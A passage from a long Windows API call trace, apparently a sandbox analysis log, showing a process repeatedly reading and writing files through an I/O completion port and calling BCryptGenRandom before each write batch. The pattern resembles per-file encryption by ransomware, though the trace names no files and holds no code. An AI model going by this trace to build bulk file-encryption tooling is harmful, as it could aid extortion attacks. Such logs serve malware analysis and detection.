lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.028] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe0f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.028] CloseHandle (hObject=0x170) returned 1 [0196.028] free (_Block=0x3df0008) [0196.028] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.040] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.040] free (_Block=0x3e305b8) [0196.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.040] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.041] free (_Block=0x1fa91d0) [0196.041] free (_Block=0x1fa2ed8) [0196.041] free (_Block=0x1fa90b8) [0196.041] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.042] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.066] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.077] CloseHandle (hObject=0x170) returned 1 [0196.077] free (_Block=0x3df0008) [0196.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.090] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xee9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.108] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe13, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.120] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xeff, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.129] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.201] CloseHandle (hObject=0x2a8) returned 1 [0196.202] free (_Block=0x3f70048) [0196.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.204] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe14, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.206] CloseHandle (hObject=0x170) returned 1 [0196.206] free (_Block=0x3df0008) [0196.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.221] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x12600, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0196.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.236] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2c681, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.268] CloseHandle (hObject=0x170) returned 1 [0196.268] free (_Block=0x3df0008) [0196.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.273] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.363] CloseHandle (hObject=0x308) returned 1 [0196.364] free (_Block=0x1ff1e60) [0196.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.368] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x830a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.370] CloseHandle (hObject=0x170) returned 1 [0196.370] free (_Block=0x3f70048) [0196.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.377] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.377] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.377] free (_Block=0x3e305b8) [0196.377] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.377] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.378] free (_Block=0x1fa91d0) [0196.378] free (_Block=0x1fa2ed8) [0196.378] free (_Block=0x1fa90b8) [0196.378] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.380] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8710, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.380] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.391] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5eda, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.405] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa80a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.420] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ffa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.421] CloseHandle (hObject=0x170) returned 1 [0196.421] free (_Block=0x3df0008) [0196.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.431] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.431] free (_Block=0x3e305b8) [0196.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.432] free (_Block=0x1fa91d0) [0196.432] free (_Block=0x1fa2ed8) [0196.432] free (_Block=0x1fa90b8) [0196.432] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.433] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.463] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d94, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.464] CloseHandle (hObject=0x170) returned 1 [0196.464] free (_Block=0x3df0008) [0196.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.483] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.483] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.483] free (_Block=0x3e305b8) [0196.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.483] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.483] free (_Block=0x1fa91d0) [0196.483] free (_Block=0x1fa2ed8) [0196.483] free (_Block=0x1fa90b8) [0196.483] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.485] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.497] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4d38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.516] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7018, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.537] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14fa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.557] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x171c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.581] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2f64, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.582] CloseHandle (hObject=0x170) returned 1 [0196.582] free (_Block=0x3df0008) [0196.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.619] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.619] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.619] free (_Block=0x3e305b8) [0196.619] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.619] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.620] free (_Block=0x1fa91d0) [0196.620] free (_Block=0x1fa2ed8) [0196.620] free (_Block=0x1fa90b8) [0196.620] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.634] GetProcAddress 